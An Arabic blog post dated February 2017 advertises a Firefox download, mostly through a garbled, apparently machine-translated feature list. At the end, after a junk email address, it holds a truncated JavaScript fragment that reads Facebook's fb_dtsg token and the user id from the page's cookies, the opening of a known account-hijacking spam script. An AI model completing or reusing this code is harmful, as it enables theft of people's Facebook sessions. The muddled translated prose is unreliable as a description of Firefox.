jeudi 23 février 2017

تحميل برنامج فيرفوكس اخر اصدار2017


تحميل برنامج فيرفوكس اخر اصدار2017

نتيجة بحث الصور عن ‪mozilla firefox‬‏

موزيلا فايرفوكس هو حر ومفتوح المصدر متصفح الويب التي توفر العديد من الميزات وخيارات التخصيص. أدائها الممتاز، والتي تم تصميمها لحماية خصوصيتك.كل الميزات التي تحتاجها


فايرفوكس يشمل العديد من الميزات المضمنة التي يمكن تمديدها من خلال كتالوج واسعة من الملحقات.
ويوفر كلفه التصفح للتخصيص، والمعيار على جميع المتصفحات الآن لبعض الوقت. كما أن لديها محرك بحث متكامل وغير قابل للتعديل بسهولة.
من الصفحة الرئيسية، سيكون لديك الوصول إلى مربع البحث جوجل وقائمة اختصارات للوصول إلى التنزيلات، والعناوين، والتاريخ، إضافات، والتزامن وإعدادات. كان لديه كل الميزات الأساسية وتشمل أيضا المدقق الإملائي، المدمج في قارئ PDF، والملاحة مع تحديد الموقع الجغرافي، وأكثر من ذلك بكثير.
أما بالنسبة للأمن، هناك مانع النوافذ المنبثقة، مرشح مكافحة الخداع، وميزات لحماية خصوصيتك، وحجر الزاوية في موزيلا. بالإضافة إلى وضع التصفح الخاص المعتاد، فايرفوكس يتيح لك خيار لمنع المواقع من تعقب لك، وحتى ان اقول لكم المواقع التي كنت يجري تعقب باستخدام Lightbeam الإضافة.
تقدم فايرفوكس النظام الذي يضمن أن المواقع التي تزورها هي موثوق بها، والتحقق أيضا أن لديك اتصال آمن. تحديثات الأمان تلقائية للتأكد من أنك دائما بالحماية ضد آخر التهديدات.
ويقدم أيضا بعض الميزات الأساسية، والتي هي المدقق الإملائي، وقارئ PDF متكامل والملاحة مع تحديد الموقع الجغرافي، ووضع القراءة لقراءة دون الانحرافات، والتكامل مع الجيب وأكثر من ذلك.عالية للتخصيص


واحدة من أكبر مزايا فايرفوكس هو قدرته على التكيف مع كل مستخدم، ويأتي ذلك بفضل خيارات التخصيص العديدة التي تسمح لك لتنظيم المتصفح وتكييفها لاحتياجاتك - بما في ذلك القدرة على السماح للمواقع المفضلة لديك لنرسل لك دفع الإخطارات.
والعديد من الموضوعات المتاحة للتتبيل حتى واجهة فايرفوكس الخاص بك، ويمكنك تنظيم الأدوات الخاصة بك والميزات الأكثر استخداما كما تريد في القائمة أو شريط الأدوات الشخصية.
إضافات هي أيضا وسيلة رائعة لتخصيص المتصفح وزيادة الوظائف. أصبحت بعض الوظائف الإضافية ضرورية، مثل Adblock زائد أو فيديو DownloadHelper، اللتين لديهما عدة ملايين من المستخدمين.
وبالإضافة إلى ذلك، فايرفوكس ديه فايرفوكس مرحبا، خدمة غرف الدردشة سريعة الزوال، على غرار دردشة الفيديو الجماعية وعلى أساس بتقنية WebRTC بروتوكول (بحيث أنك لن تحتاج المساعد إضافية). مع فايرفوكس مرحبا يمكنك أيضا إرسال الصفحة التي تزورها مباشرة إلى أصدقائك.
منذ النسخة 35، فايرفوكس يتيح الوصول إلى متجر امتداده فايرفوكس السوق من شريط الأدوات نفسها.واحدة من أفضل المتصفحات المتاحة


هناك سبب لماذا موزيلا فايرفوكس هو واحد من متصفحات الويب الأكثر شعبية في العالم. انها كاملة من حيث الميزات والموثوقية والمرونة، وأنها توفر كل ما تحتاجه لتصفح الإنترنت في أسلس وسيلة ممكنة.

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...